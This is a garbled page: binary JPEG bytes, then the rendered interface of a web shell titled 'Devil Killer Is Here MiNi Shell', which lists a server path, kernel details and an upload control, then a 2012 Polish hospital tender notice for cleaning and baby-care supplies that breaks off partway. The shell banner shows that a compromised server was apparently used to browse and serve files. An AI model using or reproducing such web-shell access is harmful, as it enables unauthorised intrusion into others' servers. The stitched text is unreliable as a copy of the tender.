JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120118/16973-N-2012.html

<p class="kh_header"><b>Toruń: Dostawa środków czyszczących, papieru toaletowego, ręczników papierowych, koncentratów i płynu do mycia i czyszczenia, ścierek jedno i wielorazowego użytku, mopów, pianek i oliwek do  mycia  niemowląt, ręczników papierowych płynów do mycia butelek i smoczków dla dzieci</b><br>
<b>Numer ogłoszenia: 16973 - 2012; data zamieszczenia: 18.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czyszczących, papieru toaletowego, ręczników papierowych, koncentratów i płynu do mycia i czyszczenia, ścierek jedno i wielorazowego użytku, mopów, pianek i oliwek do  mycia  niemowląt, ręczników papierowych płynów do mycia butelek i smoczków dla dzieci.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa :<br>

Zadanie Nr 1 - środków czyszczących<br>

1.Mydło do rąk kostka 100 g -180szt.<br>

2.Mydło do rąk w płynie, max wielkość opakowania 6 litrów - 243 l<br>

3.Płyn do naczyń, butelka 0,5 l - 954 l<br>

4.Płyn do naczyń, butelka 5 l -780 l<br>

5.Proszek do prania, opakowanie min.600 g -60 op<br>

6.Krem do rąk, tubka 75 ml -3096 szt<br>

7.Szampon do włosów, butelka 300 ml -336 szt<br>

8.Pasta BHP, opakowanie 450 g -576szt<br>

9.Proszek do czyszczenia urządzeń sanitarnych, opakowanie 0,5 kg -132 szt<br>

10.Płyn do mycia szyb, butelka 0,5 l -108 szt<br>

11.Emulsja do czyszczenia urządzeń sanitarnych z wybielaczem, butelka 700 ml -108 szt<br>

12.Zmywak gąbka wymiary 80mmx55mm -252 szt<br>

13.Denaturat, butelka 0,5 l - 48 szt<br>

14.Maszynki  do golenia jednorazowego użytku -100 szt<br>


Zadanie Nr 2 - papieru toaletowego, ręczników papierowych<br>


1.Papier toaletowy na rolce, nie pylący o gramaturze powyżej 30 g-m2, szerokość rolki 9,6- 10 cm, waga rolki min 110 g, długość minimum 28m -2532 rolek<br>

2.Ręcznik papierowy na rolce, pakowany po dwie sztuki,  nie pylący o szerokości min 22 cm, gramaturze min 40 g-m2 , długość rolki min 12 m.-4056rolek<br>

3.Ręcznik papierowy 2 warstwowy,  celulozowy w kolorze białym składany w ZZ nie pylący, gramatura 2x18 g-m2, pakowany po 3000 listków, wymiary listka: szerokość 25 cm długość 23 cm Karton  zawierający 3000 listków-132  kartony<br>

Zadanie Nr 3 - koncentratów i płynu do mycia i czyszczenia<br>


1.Koncentrat do posadzek wodoodpornych  w szczególności do posadzek błyszczących i zabezpieczonych powłokami akrylowymi. Pozostawiający cienką powłokę, odporną na zabrudzenia, długotrwały i świeży zapach o wysokiej skuteczności mycia połączonej  z doskonałymi właściwościami pielęgnacyjnymi. Nie zawierający wosków, mydła i pochodnych eteru.  Zawierający anionowe związki powierzchniowo czynne, etoksylowany alkohol tłuszczowy 1-2%, substancje zapachowe, alkiloeterosiarczany 1-2%, pH 6,9-7,1 koncentratu w kolorze zielonym, stężenie 0,5 - 2%, opakowanie o pojemności 1000 ml - 288 litrów<br>

2.Koncentrat do wszystkich zmywalnych powierzchni takich jak: szkło, marmur, emalia, plastik, drewno. Pozostawiający długotrwały, świeży zapach, nie pozostawiający smug . Zawierający anionowe związki powierzchniowo czynne, etoksylowany alkohol tłuszczowy 1-2%, substancje zapachowe, alkiloeterosiarczany 1-2%, ph koncentratu 6,9- 7,1 ,w kolorze  niebieskim, stężenie 0,5 - 2 %, opakowanie o pojemności 1000 ml - 50 litrów<br>

3.Koncentrat do wszystkich powierzchni odpornych na działanie kwasów, posiadający doskonałe właściwości w usuwaniu kamienia, osadów wapniowych i wszelkich zabrudzeń z powierzchni sanitarnych, pozostawiający długotrwały i świeży zapach. Nie uszkadzający czyszczonych powierzchni. Zawierający niejonowe związki powierzchniowo czynne, kwas amidosiarkowy 5-10%, etoksylowany alkohol tłuszczowy 2-5 %, substancje zapachowe, pH koncentratu 0,4-0,6, kolor czerwony, stężenie 0,5-2%, opakowanie o pojemności 1000 ml - 50 litrów<br>

4.Płyn do czyszczenia sanitariatów w opakowaniu o pojemności  
0,6 -0,8 l umożliwiającym bezpośrednie dozowanie, pH  0,5 do 0,6 zawierający kwas fosforowy 5-15%,  gęstość 20o 0,98-1,02g/ml, opakowanie o pojemności 
0,6 - 0,8 L -200 litrów<br>


Zadanie Nr 4 - ścierek jedno i wielorazowego użytku, mopów, pianek i oliwek 
                           do mycia niemowląt<br>

1.Ścierki jednorazowe w kolorze białym o wymiarach 32x39 cm, pakowane po 50 - 100 sztuk - 12200 szt.<br>

2.Ścierki wielorazowego i długotrwałego  użycia przeznaczone do mycia i dezynfekcji powierzchni przeznaczone do wielokrotnego prania minimum 300 prań w temperaturze 60°C.Wykonane z mieszanki poliestru 70% i poliamidu 30%. o dużej chłonności wody o wymiarach 40 x 40 cm.  w kolorach:czerwony - 110szt., niebieski - 180szt., żółty  - 180szt<br>

3.Mopy do wielorazowego użytku  i wielokrotnego prania (minimum 350 prań), odporne na działanie preparatów dezynfekcyjnych. Wykonane z bawełny, ze specjalnym zaczepem umożliwiającym mycie (bezdotykowe), pędzelkowo cięty, tkany, nie przeszywany o wymiarach 40 x13 - 14 cm. Temperatura prania minimum 95 °C.-200szt<br>

4.Pianka do mycia niemowląt z możliwością stosowania u noworodków . Opakowanie dostosowane do systemu  typu Dermados (dotyczy opakowań 400 ml), będących w posiadaniu zamawiającego.Opakowanie 200ml -120 szt, Opakowanie 400 ml -70 szt<br>

5.Oliwka  dla niemowląt 200 ml -200 szt<br>

Zadanie Nr 5 -ręczników papierowych<br>
1.Ręczniki do wycierania rąk,  papierowe w rolce, białe bez perforacji, wykonane z włókien przetworzonych minimum 60 % i pierwotnych maksymalnie 40%. Jaskrawość - białość od 70 - 75 %, metoda wybielania bez zawartości chloru. Długość rolki od 164 - 170 m, szerokość 20 cm, średnica całkowita rolki 150 mm. Podstawowa waga nie mniejsza niż 30g/m2, wykonana w jednej warstwie -500 szt<br>

Zadanie Nr 6 -płynów do mycia butelek i smoczków dla dzieci<br>

1.Płyn do mycia butelek, smoczków bezpieczny dla dziecka, usuwający białka mleka, substancje zagęszczające nie zawierający barwników ani wybielaczy, nieperfumowany, konstrukcja płynna, bezbarwny, ph neutralne dla skóry, zawierający naturalne enzymy: proteazy i mannanazy-butelka 0,5 l -300  l.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 33.76.10.00-2, 33.76.30.00-6, 39.51.42.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych min. 2 dostaw  środków czystościowych o wartości min. dla poszczególnych zadań:
Zadanie Nr 1 -    3.900,00zł,
Zadanie Nr 2 -    3.750,00zł,
Zadanie Nr 3 -        750,00zł,
Zadanie Nr 4 -     5.910,00zł,
Zadanie Nr 5 -     3.660,00zł,
Zadanie Nr 6 -     3.150,00zł,
brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;
Wykonawca składający ofertę na kilka zadań musi wykazać się zrealizowanymi 
min. 2 dostawami o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta np. Wykonawca składający ofertę na zad. Nr 1 i Nr 2 musi wykazać się zrealizowanymi 2 dostawami o wymaganej wartości łącznej równej sumie  7.650,00 zł każda dostawa.
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:
Zadanie Nr 1-   3.250,00 zł,
Zadanie Nr 2 -  3.125,00 zł,
Zadanie Nr 3 -     625,00zł,
Zadanie Nr 4 -   4.925,00zł,
Zadanie Nr 5 -   3.050,00zł,
Zadanie Nr 6 -   2.625,00zł
 wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
         / Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku         udziału/.
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.
      Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

      Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) oświadczenie, że na oferowane wyroby posiada dokumentację potwierdzającą zgodność danego wyrobu lub procesu jego wytwarzania z zasadniczymi wymogami
 b) dla wyrobów sklasyfikowanych jako niebezpieczne Zamawiający wymaga załączenia do oferty aktualnej karty charakterystyki preparatu niebezpiecznego.
c) próbki oferowanych wyrobów - min. po 1 opakowaniu lub 1 szt. z każdego asortymentu 
w opakowaniu handlowym.
 Wykonawca zobowiązany jest do dostarczenia próbek oferowanego przedmiotu zamówienia najpóźniej w dniu i do godziny wyznaczonej na składanie ofert.
 Zamawiający zgodnie z art. 97 ust. 2 zwróci próbki na wniosek Wykonawcy, który należy dołączyć do oferty.
 d) instrukcję użytkowania w języku polskim dla oferowanego przedmiotu zamówienia 
      w zadaniu Nr 3 poz. 1-3.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny podane w ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych 
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera 
ul. Św. Józefa 53/59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2012 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - środki czyszczące<br>

1.Mydło do rąk kostka 100 g -180szt.<br>

2.Mydło do rąk w płynie, max wielkość opakowania 6 litrów - 243 l<br>

3.Płyn do naczyń, butelka 0,5 l - 954 l<br>

4.Płyn do naczyń, butelka 5 l -780 l<br>

5.Proszek do prania, opakowanie min.600 g -60 op<br>

6.Krem do rąk, tubka 75 ml -3096 szt<br>

7.Szampon do włosów, butelka 300 ml -336 szt<br>

8.Pasta BHP, opakowanie 450 g -576szt<br>

9.Proszek do czyszczenia urządzeń sanitarnych, opakowanie 0,5 kg -132 szt<br>

10.Płyn do mycia szyb, butelka 0,5 l -108 szt<br>

11.Emulsja do czyszczenia urządzeń sanitarnych z wybielaczem, butelka 700 ml -108 szt<br>

12.Zmywak gąbka wymiary 80mmx55mm -252 szt<br>

13.Denaturat, butelka 0,5 l - 48 szt<br>

14.Maszynki  do golenia jednorazowego użytku -100 szt<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2 - papier toaletowy, ręczniki papierowe

1.Papier toaletowy na rolce, nie pylący o gramaturze powyżej 30 g-m2, szerokość rolki 9,6- 10 cm, waga rolki min 110 g, długość minimum 28m -2532 rolek<br>

2.Ręcznik papierowy na rolce, pakowany po dwie sztuki,  nie pylący o szerokości min 22 cm, gramaturze min 40 g-m2 , długość rolki min 12 m.-4056rolek<br>

3.Ręcznik papierowy 2 warstwowy,  celulozowy w kolorze białym składany w ZZ nie pylący, gramatura 2x18 g-m2, pakowany po 3000 listków, wymiary listka: szerokość 25 cm długość 23 cm Karton  zawierający 3000 listków-132  kartony<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3 - koncentraty i płyn do mycia i czyszczenia

1.Koncentrat do posadzek wodoodpornych  w szczególności do posadzek błyszczących i zabezpieczonych powłokami akrylowymi. Pozostawiający cienką powłokę, odporną na zabrudzenia, długotrwały i świeży zapach o wysokiej skuteczności mycia połączonej  z doskonałymi właściwościami pielęgnacyjnymi. Nie zawierający wosków, mydła i pochodnych eteru.  Zawierający anionowe związki powierzchniowo czynne, etoksylowany alkohol tłuszczowy 1-2%, substancje zapachowe, alkiloeterosiarczany 1-2%, pH 6,9-7,1 koncentratu w kolorze zielonym, stężenie 0,5 - 2%, opakowanie o pojemności 1000 ml - 288 litrów<br>

